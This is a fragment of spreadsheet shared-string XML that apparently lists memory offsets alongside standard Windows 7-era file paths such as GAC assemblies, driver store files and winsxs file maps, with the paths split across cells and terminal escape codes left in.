    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_eval_homebasicn_aa7bae8e6afccb95.cdf-ms_x001B_[0</t>
  </si>
  <si>
    <t>0xde9c1c98</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmdcm6.inf_x86_neutral_1d84a358e9409e1c\mdmdcm6.</t>
  </si>
  <si>
    <t>0xde9c1db8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_eval_homebasice_aa7bafd26afcc8bc.cdf-ms_x001B_[0</t>
  </si>
  <si>
    <t>0xde9c2dc0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_drivers_umdf_en-us_b8ba9f5b7f1c3933.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9c31c0</t>
  </si>
  <si>
    <t>0xde9c3700</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Mic</t>
  </si>
  <si>
    <t>rosoft.PowerS</t>
  </si>
  <si>
    <t>hell.Comman</t>
  </si>
  <si>
    <t>ds.Uti</t>
  </si>
  <si>
    <t>lity.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9c3920</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsof</t>
  </si>
  <si>
    <t>t.PowerShell.</t>
  </si>
  <si>
    <t>ConsoleHost</t>
  </si>
  <si>
    <t>0xde9c3b40</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Editor\1.0.0.0__31bf3856ad364e35\Microsoft.Pow</t>
  </si>
  <si>
    <t>erShell.Edito</t>
  </si>
  <si>
    <t>0xde9c3d60</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.GPowerShell\1.0.0.0__31bf3856ad364e35\Microsof</t>
  </si>
  <si>
    <t>GPowerShell</t>
  </si>
  <si>
    <t>0xde9c3f80</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.GraphicalHost\1.0.0.0__31bf3856ad364e35\Micros</t>
  </si>
  <si>
    <t>oft.PowerShel</t>
  </si>
  <si>
    <t>l.Graphical</t>
  </si>
  <si>
    <t>0xde9c42b8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\intelppm.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9c47b0</t>
  </si>
  <si>
    <t>0xde9c4870</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\RAC\PublishedData\RacWmiDatabase.sdf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9c4b08</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\diagperf.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9c5360</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_replacementmanifests_microsoft-windows-ndis_b44547</t>
  </si>
  <si>
    <t>c729f73574.cd</t>
  </si>
  <si>
    <t>0xde9c5748</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_replacementmanifests_microsoft-windows-iis-rm_9ee4</t>
  </si>
  <si>
    <t>68490d6de347.</t>
  </si>
  <si>
    <t>0xde9c5a10</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\dc21x4vm.inf_x86_neutral_8887242a56ee027e\dc21x4v</t>
  </si>
  <si>
    <t>0xde9c5b30</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_replacementmanifests_microsoft-windows-gameuxmig_7</t>
  </si>
  <si>
    <t>26077238a45fd</t>
  </si>
  <si>
    <t>4a.cdf-ms_x001B_[</t>
  </si>
  <si>
    <t>0xde9c5f18</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_replacementmanifests_microsoft-windows-audio-mmeco</t>
  </si>
  <si>
    <t>re-other_5137</t>
  </si>
  <si>
    <t>bedd30b4e5d</t>
  </si>
  <si>
    <t>8.cdf-</t>
  </si>
  <si>
    <t>0xde9c6320</t>
  </si>
  <si>
    <t>0xde9c6448</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\6ba05563254fb8184910d1f96abeb797\SMSvcH</t>
  </si>
  <si>
    <t>ost.ni.exe.au</t>
  </si>
  <si>
    <t>x_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9c7340</t>
  </si>
  <si>
    <t>\$Mft_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9c74c0</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP8746.tmp\Microsoft.MediaCenter.iTv.Hostin</t>
  </si>
  <si>
    <t>g.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9c82a0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\oleres.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9c84e8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\blbdrive.inf_x86_neutral_1aa816fe7dc98c3f\blbdriv</t>
  </si>
  <si>
    <t>0xde9c8768</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\scrnsave.scr.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9ca038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_windowsupdate_0862ad88ff233b9d.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9ca278</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPEDA6.tmp\Microsoft.Build.Engine.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9cc1d8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Web.Entity.Design\3.5.0.0__b77a5c561934e089\System.Web.Entit</t>
  </si>
  <si>
    <t>y.Design.dll_x001B_</t>
  </si>
  <si>
    <t>0xde9cc290</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Web.DynamicData.Design\3.5.0.0__31bf3856ad364e35\System.Web.</t>
  </si>
  <si>
    <t>DynamicData.D</t>
  </si>
  <si>
    <t>esign.dll_x001B_[</t>
  </si>
  <si>
    <t>0xde9cc488</t>
  </si>
  <si>
    <t>0xde9ccd50</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wd.inf_x86_neutral_81cae93d8afd51d5\wd.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9cde58</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Data.Services.Design\3.5.0.0__b77a5c561934e089\System.Data.S</t>
  </si>
  <si>
    <t>ervices.Desig</t>
  </si>
  <si>
    <t>0xde9cdf80</t>
  </si>
  <si>
    <t>0xde9d5340</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_rdyboost_0409_50c6198d7330ca6a.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9d5a48</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_audio_en-us_9fb258d76056760d.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9d6160</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAP8512.tmp\WindowsFormsIntegration.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9d67e8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\Microsoft.MediaCenter.Playback\6.1.0.0__31bf3856ad364e35\Microsoft.Me</t>
  </si>
  <si>
    <t>diaCenter.Pla</t>
  </si>
  <si>
    <t>yback.dll_x001B_[</t>
  </si>
  <si>
    <t>0xde9d68a0</t>
  </si>
  <si>
    <t>0xde9d7468</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_.netframework_266880c2626e99c6.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9d7948</t>
  </si>
  <si>
    <t>0xde9d8038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_boot_pcat_el-gr_da43f0fe296cebfd.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9d8560</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\System.Web.Routing\5bf843c31dfb0689a6b4_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9d8718</t>
  </si>
  <si>
    <t>\Windows\System32\accessibilitycpl.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9d8a98</t>
  </si>
  <si>
    <t>0xde9d8c80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\WcsPlugInService.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9d9210</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\monitor.inf_x86_neutral_f7168ca1d7f8ec24\monitor.</t>
  </si>
  <si>
    <t>inf_x001B_[0K_x001B_[65G</t>
  </si>
  <si>
    <t>0xde9d9458</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\DpiScaling.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9d9740</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#\c5e16dfede605168f86bc337ca4c</t>
  </si>
  <si>
    <t>8171\Presenta</t>
  </si>
  <si>
    <t>temDrawing.ni.dll.aux_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9d97f8</t>
  </si>
  <si>
    <t>0xde9d98b0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Entity\v4.0_4.0.0.0__b77a5c561934e089\Sys</t>
  </si>
  <si>
    <t>tem.Data.Enti</t>
  </si>
  <si>
    <t>ty.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9d9ae8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_microsoft.net_framework_v3.5_5588a8293fdc4499.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9d9c50</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\taskschd.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9d9f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_ehome_createdisc_style_0d4521df11573950.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9da2c0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__</t>
  </si>
  <si>
    <t>e35\Microso</t>
  </si>
  <si>
    <t>ft.Sec</t>
  </si>
  <si>
    <t>urity.ApplicationId.PolicyManagement.Cmdlets.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9da428</t>
  </si>
  <si>
    <t>0xde9da4e0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Int</t>
  </si>
  <si>
    <t>erop\6.1.0.0_</t>
  </si>
  <si>
    <t>_31bf3856ad</t>
  </si>
  <si>
    <t>\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineAp_x001B_[0Ki</t>
  </si>
  <si>
    <t>.Interop.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9da648</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\iccvid.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9da700</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1</t>
  </si>
  <si>
    <t>.0.0__31bf385</t>
  </si>
  <si>
    <t>6ad364e35\M</t>
  </si>
  <si>
    <t>icroso</t>
  </si>
  <si>
    <t>ft.Security.ApplicationId.PolicyManagement.PolicyManager.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9da920</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0</t>
  </si>
  <si>
    <t>.0__31bf3856a</t>
  </si>
  <si>
    <t>d364e35\Mic</t>
  </si>
  <si>
    <t>rosoft</t>
  </si>
  <si>
    <t>.Security.ApplicationId.PolicyManagement.PolicyModel.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9dab40</t>
  </si>
  <si>
    <t>0xde9dad60</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.Wizards.AutomaticRuleGenerationWiz</t>
  </si>
  <si>
    <t>ard\6.1.0.0__</t>
  </si>
  <si>
    <t>31bf3856ad3</t>
  </si>
  <si>
    <t>64e35\</t>
  </si>
  <si>
    <t>Microsoft.Security.ApplicationId.Wizards.AutomaticRuleGenerationW_x001B_[0Ki</t>
  </si>
  <si>
    <t>zard.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9daf80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Transactions.Bridge\v4.0_4.0.0.0__b03f5f7f1</t>
  </si>
  <si>
    <t>1d50a3a\Micro</t>
  </si>
  <si>
    <t>soft.Transa</t>
  </si>
  <si>
    <t>ctions</t>
  </si>
  <si>
    <t>.Bridge.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9db1f8</t>
  </si>
  <si>
    <t>0xde9db418</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.Composition.Registration\v4.0_4</t>
  </si>
  <si>
    <t>.0.0.0__b77a5</t>
  </si>
  <si>
    <t>c561934e089</t>
  </si>
  <si>
    <t>\Syste</t>
  </si>
  <si>
    <t>m.ComponentModel.Composition.Registration.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9db638</t>
  </si>
  <si>
    <t>0xde9db858</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.DataAnnotations\v4.0_4.0.0.0__3</t>
  </si>
  <si>
    <t>35\System.C</t>
  </si>
  <si>
    <t>ompone</t>
  </si>
  <si>
    <t>ntModel.DataAnnotations.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9db9c0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.R</t>
  </si>
  <si>
    <t>untime.dll_x001B_[0</t>
  </si>
  <si>
    <t>0xde9dba78</t>
  </si>
  <si>
    <t>0xde9dbc98</t>
  </si>
  <si>
    <t>0xde9dbeb8</t>
  </si>
  <si>
    <t>0xde9dc038</t>
  </si>
  <si>
    <t>0xde9dc158</t>
  </si>
  <si>
    <t>0xde9dc378</t>
  </si>
  <si>
    <t>0xde9dc4e0</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\Mcx2Dvcs\6.1.0.0__31bf3856ad364e35\Mcx2Dvcs.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9dc598</t>
  </si>
  <si>
    <t>0xde9dc7b8</t>
  </si>
  <si>
    <t>0xde9dc9d8</t>
  </si>
  <si>
    <t>0xde9dcbf8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_32\System.Data.OracleClient\v4.0_4.0.0.0__b77a5c561934e089</t>
  </si>
  <si>
    <t>\System.Data.</t>
  </si>
  <si>
    <t>OracleClien</t>
  </si>
  <si>
    <t>t.dll_x001B_</t>
  </si>
  <si>
    <t>0xde9dce18</t>
  </si>
  <si>
    <t>0xde9dcf80</t>
  </si>
  <si>
    <t>0xde9dd038</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Design\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.D</t>
  </si>
  <si>
    <t>0xde9dd2c0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Entity.Design\v4.0_4.0.0.0__b77a5c561934e0</t>
  </si>
  <si>
    <t>89\System.Web</t>
  </si>
  <si>
    <t>.Entity.Des</t>
  </si>
  <si>
    <t>ign.dl</t>
  </si>
  <si>
    <t>0xde9dd378</t>
  </si>
  <si>
    <t>0xde9dd450</t>
  </si>
  <si>
    <t>\Windows\rescache\rc0004\ResCache.dir_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9dd598</t>
  </si>
  <si>
    <t>0xde9dd7b8</t>
  </si>
  <si>
    <t>0xde9dd9d8</t>
  </si>
  <si>
    <t>0xde9ddbf8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\Sys</t>
  </si>
  <si>
    <t>tem.Data.SqlX</t>
  </si>
  <si>
    <t>ml.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9dde18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\Syst</t>
  </si>
  <si>
    <t>em.Deployment</t>
  </si>
  <si>
    <t>0xde9de038</t>
  </si>
  <si>
    <t>0xde9de2b0</t>
  </si>
  <si>
    <t>0xde9de598</t>
  </si>
  <si>
    <t>0xde9de7b8</t>
  </si>
  <si>
    <t>0xde9de9d8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices.Protocols\v4.0_4.0.0.0__b03f</t>
  </si>
  <si>
    <t>5f7f11d50a3a\</t>
  </si>
  <si>
    <t>System.Dire</t>
  </si>
  <si>
    <t>ctoryS</t>
  </si>
  <si>
    <t>ervices.Protocols.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9debf8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing.Design\v4.0_4.0.0.0__b03f5f7f11d50a3a\</t>
  </si>
  <si>
    <t>System.Drawin</t>
  </si>
  <si>
    <t>g.Design.dl</t>
  </si>
  <si>
    <t>0xde9dee18</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3</t>
  </si>
  <si>
    <t>a\System.Ente</t>
  </si>
  <si>
    <t>rpriseServi</t>
  </si>
  <si>
    <t>ces.dl</t>
  </si>
  <si>
    <t>0xde9df038</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Log\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.I</t>
  </si>
  <si>
    <t>O.Log.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9df2b0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\S</t>
  </si>
  <si>
    <t>ystem.Identit</t>
  </si>
  <si>
    <t>yModel.dll_x001B_</t>
  </si>
  <si>
    <t>0xde9df4d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel.Selectors\v4.0_4.0.0.0__b77a5c56</t>
  </si>
  <si>
    <t>em.Identity</t>
  </si>
  <si>
    <t>Model.</t>
  </si>
  <si>
    <t>Selectors.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9df7b8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel.Services\v4.0_4.0.0.0__b77a5c561</t>
  </si>
  <si>
    <t>m.IdentityM</t>
  </si>
  <si>
    <t>odel.S</t>
  </si>
  <si>
    <t>ervices.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9df9d8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\</t>
  </si>
  <si>
    <t>System.IO.Com</t>
  </si>
  <si>
    <t>pression.dl</t>
  </si>
  <si>
    <t>0xde9dfbf8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c</t>
  </si>
  <si>
    <t>561934e089\Sy</t>
  </si>
  <si>
    <t>stem.IO.Com</t>
  </si>
  <si>
    <t>pressi</t>
  </si>
  <si>
    <t>on.FileSystem.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9dfe18</t>
  </si>
  <si>
    <t>0xde9e0240</t>
  </si>
  <si>
    <t>0xde9e02f8</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\ehexthost\6.1.0.0__31bf3856ad364e35\ehexthost.exe_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e05c8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\qwavedrv.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e09b8</t>
  </si>
  <si>
    <t>0xde9e0ba0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\Wpc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e1038</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Speech\v4.0_4.0.0.0__31bf3856ad364e35\System.S</t>
  </si>
  <si>
    <t>peech.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e12b0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856a</t>
  </si>
  <si>
    <t>d364e35\Syste</t>
  </si>
  <si>
    <t>m.ServiceMo</t>
  </si>
  <si>
    <t>del.In</t>
  </si>
  <si>
    <t>ternals.dll_x001B_[0K_x001B_[120G</t>
  </si>
  <si>
    <t>0xde9e14d0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Routing\v4.0_4.0.0.0__31bf3856ad3</t>
  </si>
  <si>
    <t>64e35\System.</t>
  </si>
  <si>
    <t>ServiceMode</t>
  </si>
  <si>
    <t>l.Rout</t>
  </si>
  <si>
    <t>ing.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e16f0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.ServiceMoniker40\v4.0_4.0.0.0__b7</t>
  </si>
  <si>
    <t>7a5c561934e08</t>
  </si>
  <si>
    <t>9\System.Se</t>
  </si>
  <si>
    <t>rviceM</t>
  </si>
  <si>
    <t>odel.ServiceMoniker40.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e1910</t>
  </si>
  <si>
    <t>0xde9e1b30</t>
  </si>
  <si>
    <t>0xde9e1d50</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\System.Speech\3.0.0.0__31bf3856ad364e35\System.Speech.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e2748</t>
  </si>
  <si>
    <t>0xde9e2ca0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\umbus.inf_x86_neutral_79120b2cb6857971\umbus.inf_x001B_</t>
  </si>
  <si>
    <t>0xde9e2f80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\IPBusEnum.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e3460</t>
  </si>
  <si>
    <t>0xde9e3588</t>
  </si>
  <si>
    <t>ost.ni.exe_x001B_[0</t>
  </si>
  <si>
    <t>0xde9e3718</t>
  </si>
  <si>
    <t>0xde9e3cb8</t>
  </si>
  <si>
    <t>0xde9e41f8</t>
  </si>
  <si>
    <t>0xde9e4418</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationBuildTasks\v4.0_4.0.0.0__31bf3856ad364e35</t>
  </si>
  <si>
    <t>\Presentation</t>
  </si>
  <si>
    <t>BuildTasks.</t>
  </si>
  <si>
    <t>0xde9e4638</t>
  </si>
  <si>
    <t>0xde9e4858</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemCore\v4.0_4.0.0.0__b77a5c</t>
  </si>
  <si>
    <t>561934e089\Pr</t>
  </si>
  <si>
    <t>esentationF</t>
  </si>
  <si>
    <t>ramewo</t>
  </si>
  <si>
    <t>rk-SystemCore.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e4b40</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemData\v4.0_4.0.0.0__b77a5c</t>
  </si>
  <si>
    <t>rk-SystemData.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e4d60</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemDrawing\v4.0_4.0.0.0__b77</t>
  </si>
  <si>
    <t>a5c561934e089</t>
  </si>
  <si>
    <t>\Presentati</t>
  </si>
  <si>
    <t>onFram</t>
  </si>
  <si>
    <t>ework-SystemDrawing.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e4f80</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c5</t>
  </si>
  <si>
    <t>61934e089\Pre</t>
  </si>
  <si>
    <t>sentationFr</t>
  </si>
  <si>
    <t>amewor</t>
  </si>
  <si>
    <t>k-SystemXml.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e5038</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\Temp\ZAPECC0.tmp\Microsoft.Build.Conversion.v3.5.</t>
  </si>
  <si>
    <t>0xde9e51f8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXmlLinq\v4.0_4.0.0.0__b77</t>
  </si>
  <si>
    <t>ework-SystemXmlLinq.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e5418</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework.AeroLite\v4.0_4.0.0.0__31bf3856</t>
  </si>
  <si>
    <t>ad364e35\Pres</t>
  </si>
  <si>
    <t>entationFra</t>
  </si>
  <si>
    <t>mework</t>
  </si>
  <si>
    <t>.AeroLite.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e5638</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationUI\v4.0_4.0.0.0__31bf3856ad364e35\Present</t>
  </si>
  <si>
    <t>ationUI.dll_x001B_[</t>
  </si>
  <si>
    <t>0xde9e5858</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\ReachFramework\v4.0_4.0.0.0__31bf3856ad364e35\ReachFr</t>
  </si>
  <si>
    <t>amework.dll_x001B_[</t>
  </si>
  <si>
    <t>0xde9e5a78</t>
  </si>
  <si>
    <t>0xde9e5d60</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagno</t>
  </si>
  <si>
    <t>stics.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e5ec8</t>
  </si>
  <si>
    <t>0xde9e5f80</t>
  </si>
  <si>
    <t>0xde9e6140</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\ehCIR\d8f8290c1d766dd4ec49_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e61f8</t>
  </si>
  <si>
    <t>0xde9e6418</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_32\MSBuild\3.5.0.0__b03f5f7f11d50a3a\msbuild.exe.config_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e6638</t>
  </si>
  <si>
    <t>0xde9e67a0</t>
  </si>
  <si>
    <t>0xde9e6920</t>
  </si>
  <si>
    <t>0xde9e6b40</t>
  </si>
  <si>
    <t>0xde9e6d60</t>
  </si>
  <si>
    <t>0xde9e6f80</t>
  </si>
  <si>
    <t>0xde9e71f8</t>
  </si>
  <si>
    <t>0xde9e7360</t>
  </si>
  <si>
    <t>\Windows\assembly\GAC_MSIL\Microsoft.MediaCenter.Sports\6.1.0.0__31bf3856ad364e35\Microsoft.Me</t>
  </si>
  <si>
    <t>diaCenter.Spo</t>
  </si>
  <si>
    <t>rts.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e7418</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.Core.Presentation\v4.0_4.0.0.0__31b</t>
  </si>
  <si>
    <t>s.Core.Presentation.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e7580</t>
  </si>
  <si>
    <t>\Windows\assembly\NativeImages_v2.0.50727_32\MMCFxCommon\fd11f51f8346ef59ef60_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e7638</t>
  </si>
  <si>
    <t>0xde9e7858</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.Presentation\v4.0_4.0.0.0__31bf3856</t>
  </si>
  <si>
    <t>em.Activiti</t>
  </si>
  <si>
    <t>es.Pre</t>
  </si>
  <si>
    <t>sentation.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde9e7a78</t>
  </si>
  <si>
    <t>0xde9e7c98</t>
  </si>
  <si>
